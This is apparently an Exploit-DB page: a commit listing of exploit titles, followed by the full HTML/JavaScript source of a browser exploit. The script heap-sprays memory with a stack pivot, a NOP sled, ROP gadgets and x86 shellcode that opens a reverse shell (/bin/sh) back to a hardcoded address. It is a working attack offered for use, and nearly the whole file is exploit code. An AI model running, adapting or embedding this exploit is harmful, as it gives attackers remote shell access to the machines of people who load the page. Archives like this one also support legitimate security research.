ed0e1e4d44
1979 changes to exploits/shellcodes Couchdb 1.5.0 - 'uuids' Denial of Service Apache CouchDB 1.5.0 - 'uuids' Denial of Service Beyond Remote 2.2.5.3 - Denial of Service (PoC) udisks2 2.8.0 - Denial of Service (PoC) Termite 3.4 - Denial of Service (PoC) SoftX FTP Client 3.3 - Denial of Service (PoC) Silverstripe 2.3.5 - Cross-Site Request Forgery / Open redirection SilverStripe CMS 2.3.5 - Cross-Site Request Forgery / Open Redirection Silverstripe CMS 3.0.2 - Multiple Vulnerabilities SilverStripe CMS 3.0.2 - Multiple Vulnerabilities Silverstripe CMS 2.4 - File Renaming Security Bypass SilverStripe CMS 2.4 - File Renaming Security Bypass Silverstripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities SilverStripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities Silverstripe CMS 2.4.7 - 'install.php' PHP Code Injection SilverStripe CMS 2.4.7 - 'install.php' PHP Code Injection Silverstripe Pixlr Image Editor - 'upload.php' Arbitrary File Upload SilverStripe CMS Pixlr Image Editor - 'upload.php' Arbitrary File Upload Silverstripe CMS 2.4.x - 'BackURL' Open Redirection SilverStripe CMS 2.4.x - 'BackURL' Open Redirection Silverstripe CMS - 'MemberLoginForm.php' Information Disclosure SilverStripe CMS - 'MemberLoginForm.php' Information Disclosure Silverstripe CMS - Multiple HTML Injection Vulnerabilities SilverStripe CMS - Multiple HTML Injection Vulnerabilities Apache CouchDB 1.7.0 and 2.x before 2.1.1 - Remote Privilege Escalation Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation Monstra CMS before 3.0.4 - Cross-Site Scripting Monstra CMS < 3.0.4 - Cross-Site Scripting (2) Monstra CMS < 3.0.4 - Cross-Site Scripting Monstra CMS < 3.0.4 - Cross-Site Scripting (1) Navigate CMS 2.8 - Cross-Site Scripting Collectric CMU 1.0 - 'lang' SQL injection Joomla! Component CW Article Attachments 1.0.6 - 'id' SQL Injection LG SuperSign EZ CMS 2.5 - Remote Code Execution MyBB Visual Editor 1.8.18 - Cross-Site Scripting Joomla! Component AMGallery 1.2.3 - 'filter_category_id' SQL Injection Joomla! Component Micro Deal Factory 2.4.0 - 'id' SQL Injection RICOH Aficio MP 301 Printer - Cross-Site Scripting Joomla! Component Auction Factory 4.5.5 - 'filter_order' SQL Injection RICOH MP C6003 Printer - Cross-Site Scripting Linux/ARM - Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes) Linux/ARM - sigaction() Based Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (52 Bytes)
112 lines
No EOL
7.4 KiB
HTML
112 lines
No EOL
7.4 KiB
HTML
<!--
|
|
Download: https://github.com/HackerFantastic/Public/blob/master/exploits/jackrabbit.tgz
|
|
Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40936.tgz
|
|
-->
|
|
|
|
<html>
|
|
<head>
|
|
<div id="content">
|
|
<p>
|
|
<FONT>
|
|
</FONT>
|
|
</p>
|
|
<p>
|
|
<FONT>n0m3rcYn0M3rCyn0m3Rc</FONT></p>
|
|
<p>
|
|
<FONT>N0MeRCYn0m3rCyn0m3rCyn0m</FONT>
|
|
</p>
|
|
<p>
|
|
<FONT>n0MERCypDK </FONT>
|
|
</p>
|
|
</div>
|
|
<script language="JavaScript">
|
|
var xunescape = unescape;
|
|
oneblock = xunescape("%u0040%u1000");
|
|
stackpivot = xunescape("%u6885%u0805%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u5a91%u0805%u4141%u4141");
|
|
nopsled = xunescape("%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568");
|
|
|
|
ropgadget = xunescape("%udc08%u0490%ua408%u04bd%u0008%u0200%u0000%u0f00%u0700%u0000%u2200%u0000%u0000%u0000%u0000%u0000%uec00%u0491%u0008%u0200%u0000%u0200%uc100%u10e3%u0040%u0010%u0000%u0200%u9000")
|
|
|
|
<!-- connect back ("192.168.0.10,80") ffff = port, 01020304 = ipaddr "%udc08%u0490%ua408%u04bd%u0008%u0200%u0000%u0f00%u0700%u0000%u2200%u0000%u0000%u0000%u0000%u0000%uec00%u0491%u0008%u0200%u0000%u0200%uc100%u10e3%u0040%u0010%u0000%u0200%u9000%u9090%u9090%u9090%u9090%u9090%u3190%u53db%u5343%u026a%u666a%u8958%ucde1%u9380%ub059%ucd3f%u4980%uf979%u5a5b%u0168%u0302%u6604%uff68%u43ff%u5366%ue189%u66b0%u5150%u8953%u43e1%u80cd%u6852%u2f2f%u6873%u2f68%u6962%u896e%u52e3%u8953%ub0e1%ucd0b%u0080%u6568%u7061%u6120%u6464%u3a72%u2520%u3830%u0a78%u7200%u6e75%u696e%u676e%u6620%u6f72%u206d%u6568%u2061" -->
|
|
|
|
shellcode = xunescape("%u9090%u9090%u9090%u9090%u9090%u3190%u53db%u5343%u026a%u666a%u8958%ucde1%u9380%ub059%ucd3f%u4980%uf979%u5a5b%uc068%u00a8%u660a%u0068%u4350%u5366%ue189%u66b0%u5150%u8953%u43e1%u80cd%u6852%u2f2f%u6873%u2f68%u6962%u896e%u52e3%u8953%ub0e1%ucd0b%u0080%u6568%u7061%u6120%u6464%u3a72%u2520%u3830%u0a78%u7200%u6e75%u696e%u676e%u6620%u6f72%u206d%u6568%u2061");
|
|
|
|
|
|
var fullblock = oneblock;
|
|
while (fullblock.length < 393216)
|
|
{
|
|
fullblock += fullblock;
|
|
}
|
|
|
|
var sprayContainer = new Array();
|
|
var sprayready = false;
|
|
var sprayContainerIndex = 0;
|
|
|
|
function fill_function()
|
|
{
|
|
if(! sprayready) {
|
|
for (xi=0; xi<800/100; xi++, sprayContainerIndex++)
|
|
{
|
|
sprayContainer[sprayContainerIndex] = fullblock + stackpivot + oneblock + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + ropgadget + shellcode;
|
|
}
|
|
} else {
|
|
DataTranslator();
|
|
GenerateHTML();
|
|
}
|
|
if(sprayContainer.length >= 1000) {
|
|
sprayready = true;
|
|
}
|
|
}
|
|
|
|
var searchArray = new Array();
|
|
|
|
function escapeData(data)
|
|
{
|
|
var xi;
|
|
var xc;
|
|
var escData='';
|
|
for(xi=0; xi<data.length; xi++)
|
|
{
|
|
xc=data.charAt(xi);
|
|
if(xc=='&' || xc=='?' || xc=='=' || xc=='%' || xc==' ') xc = escape(xc);
|
|
escData+=xc;
|
|
}
|
|
return escData;
|
|
}
|
|
|
|
function DataTranslator()
|
|
{
|
|
searchArray = new Array();
|
|
searchArray[0] = new Array();
|
|
searchArray[0]["dac"] = "Kros";
|
|
var newElement = document.getElementById("content");
|
|
if (document.getElementsByTagName) {
|
|
var xi=0;
|
|
pTags = newElement.getElementsByTagName("p");
|
|
if (pTags.length > 0)
|
|
while (xi < pTags.length)
|
|
{
|
|
oTags = pTags[xi].getElementsByTagName("font");
|
|
searchArray[xi+1] = new Array();
|
|
if (oTags[0]) {
|
|
searchArray[xi+1]["dac"] = oTags[0].innerHTML;
|
|
}
|
|
xi++;
|
|
}
|
|
}
|
|
}
|
|
|
|
function GenerateHTML()
|
|
{
|
|
var xhtml = "";
|
|
for (xi=1;xi<searchArray.length;xi++)
|
|
{
|
|
xhtml += escapeData(searchArray[xi]["dac"]);
|
|
}
|
|
}
|
|
|
|
setInterval("fill_function()", .5);
|
|
|
|
</script>
|
|
</body>
|
|
</html> |